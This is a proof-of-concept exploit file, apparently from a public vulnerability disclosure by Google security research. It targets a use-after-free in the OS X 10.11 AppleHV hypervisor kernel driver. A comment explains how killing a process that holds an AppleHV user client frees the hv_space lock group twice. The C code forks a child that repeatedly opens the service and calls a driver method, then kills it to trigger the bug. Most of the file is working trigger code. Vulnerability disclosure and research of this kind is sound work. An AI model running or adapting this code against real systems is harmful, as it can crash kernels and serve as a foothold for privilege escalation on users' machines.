| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 | /* Source: https://code.google.com/p/google-security-research/issues/detail?id=580 The hv_space lock group gets an extra ref dropped when you kill a process with an AppleHV userclient; one via IOService::terminateWorker calling the AppleHVClient::free method (which calls lck_rw_free on the  lock group using the pointer hanging off the global _hv variable) and secondly via the hypervisor machine_thread_destroy callback (hv_callback_thread_destroy) which also calls lck_rw_free with a lock group pointer taken from _hv. tested on OS X 10.11 ElCapitan (15a284) on MacBookAir 5,2 */ //ianbeer // boot-args: debug=0x144 -v pmuflags=1 kdp_match_name=en3 gzalloc_min=100 gzalloc_max=300 -zp -zc /* OS X Kernel UaF in hypervisor driver The hv_space lock group gets an extra ref dropped (uaf) when you kill a process with an AppleHV userclient; one via IOService::terminateWorker calling the AppleHVClient::free method (which calls lck_rw_free on the  lock group using the pointer hanging off the global _hv variable) and secondly via the hypervisor machine_thread_destroy callback (hv_callback_thread_destroy) which also calls lck_rw_free with a lock group pointer taken from _hv. tested on OS X 10.11 ElCapitan (15a284) on MacBookAir 5,2 */ #include <stdio.h> #include <stdlib.h> #include <signal.h> #include <unistd.h> #include <IOKit/IOKitLib.h> int go() { io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("AppleHV")); if (service == MACH_PORT_NULL) { printf("can't find service\n"); return 0; } while(1) { io_connect_t conn; IOServiceOpen(service, mach_task_self(), 0, &conn); if (conn == MACH_PORT_NULL) { printf("can't connect to service\n"); return 0; } uint64_t inputScalar[16]; size_t inputScalarCnt = 0; uint8_t inputStruct[4096]; size_t inputStructCnt = 0; uint64_t outputScalar[16] = {0}; uint32_t outputScalarCnt = 16; char outputStruct[4096] = {0}; size_t outputStructCnt = 4096; kern_return_t err = IOConnectCallMethod( conn, 1, inputScalar, inputScalarCnt, inputStruct, inputStructCnt, outputScalar, &outputScalarCnt, outputStruct, &outputStructCnt); IOServiceClose(conn); } } int main(int argc, char** argv) { pid_t child = fork(); if (child == 0) { go(); } else { sleep(1); kill(child, 9); int sl; wait(&sl); } return 0; } |